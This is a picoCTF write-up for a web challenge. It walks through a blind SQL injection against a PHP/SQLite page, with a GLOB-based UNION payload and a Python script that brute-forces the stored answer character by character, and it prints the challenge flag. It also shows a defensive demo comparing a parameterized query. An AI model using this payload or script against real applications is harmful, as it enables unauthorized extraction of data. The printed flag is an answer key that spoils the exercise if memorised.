Points: 650
Web Exploitation
There is a website running at http://2018shell1.picoctf.com:2644 (link). Try to see if you can answer its question.
No Hints.
Looking at the source code, we can see that this web application is vulnerable to SQL injections.
include "config.php";
ini_set('error_reporting', E_ALL);
ini_set('display_errors', 'On');
$answer = $_POST["answer"];
$debug = $_POST["debug"];
$query = "SELECT * FROM answers WHERE answer='$answer'";
echo "<pre>";
echo "SQL query: ", htmlspecialchars($query), "\n";
echo "</pre>";
However, it does not print the results of the query (only the query string itself); it just tells you whether you are wrong, whether you are close (the query returned a row), or gives you the flag.
$con = new SQLite3($database_file);
$result = $con->query($query);
$row = $result->fetchArray();
if($answer == $CANARY) {
    echo "<h1>Perfect!</h1>";
    echo "<p>Your flag is: $FLAG</p>";
}
elseif ($row) {
    echo "<h1>You are so close.</h1>";
} else {
    echo "<h1>Wrong.</h1>";
}
Alright, let's create a small injection to slowly brute-force the answer.
' UNION SELECT * FROM answers WHERE answer GLOB '<input>*'; --
We use GLOB instead of LIKE because GLOB is case-sensitive, and we use * rather than % because GLOB uses Unix-style wildcards (* and ?).
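To see the mechanism from the defender's side, here is an added Python example (not part of this writeup or of the challenge's code) that rebuilds the answers table in an in-memory SQLite database with a constructed answer, runs the GLOB payload above through a lookup written like the PHP (string interpolation) and through a parameterized lookup, and checks the LIKE versus GLOB case-sensitivity claim. The table and column names come from the page; the stored answer, the function names and the payload's "S" prefix are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's answers table.
# The stored answer is made up and is not the challenge's real answer.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE answers (answer TEXT)")
con.execute("INSERT INTO answers VALUES ('Secret Answer')")


def vulnerable_lookup(answer: str):
    # Mirrors the PHP: the POST value is interpolated straight into the SQL,
    # so a quote in the input closes the literal and the rest is parsed as SQL.
    query = f"SELECT * FROM answers WHERE answer='{answer}'"
    return con.execute(query).fetchone()


def safe_lookup(answer: str):
    # Hardened form: the value is bound as a parameter and never parsed as SQL,
    # so quotes and wildcards are just characters to compare against.
    return con.execute("SELECT * FROM answers WHERE answer=?", (answer,)).fetchone()


def glob_is_case_sensitive() -> bool:
    # SQLite LIKE is case-insensitive for ASCII letters; GLOB is case-sensitive
    # and uses the Unix wildcards * and ?.
    like_hit = con.execute("SELECT 1 FROM answers WHERE answer LIKE 's%'").fetchone()
    glob_hit = con.execute("SELECT 1 FROM answers WHERE answer GLOB 's*'").fetchone()
    return like_hit is not None and glob_hit is None


# The page's payload with the prefix guess "S" (an assumption for this demo).
PAYLOAD = "' UNION SELECT * FROM answers WHERE answer GLOB 'S*'; --"


if __name__ == "__main__":
    print("vulnerable:", vulnerable_lookup(PAYLOAD))   # a row: the UNION leaks a match
    print("parameterized:", safe_lookup(PAYLOAD))       # None: payload compared literally
    print("GLOB case-sensitive:", glob_is_case_sensitive())
```

With string interpolation the payload returns a row, which on the challenge page shows up as "You are so close"; that one-bit difference between "close" and "Wrong" is what lets the prefix be extended a character at a time. With the bound parameter the same input returns nothing, so there is no oracle to drive.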
We run the script and get the flag.
import requests

URL = 'http://2018shell1.picoctf.com:2644/answer2.php'
final = ''
while True:
    for i in range(0x20, 0x7f):
        if i != 42 and i != 63:  # Skip the GLOB wildcards '*' and '?'
            params = {
                'answer': "' UNION SELECT * FROM answers WHERE answer GLOB '{}{}*'; --".format(final, chr(i))
            }
            r = requests.post(URL, data=params)
            res = r.text
            if 'close' in res:  # The GLOB prefix matched: keep this character
                final += chr(i)
                print(final)
                break
    else:
        break  # No character extended the prefix, so the answer is complete
print(requests.post(URL, data={'answer': final}).text)  # Submit the recovered answer for the flag
Working solution solve.py
picoCTF{qu3stions_ar3_h4rd_28fc1206}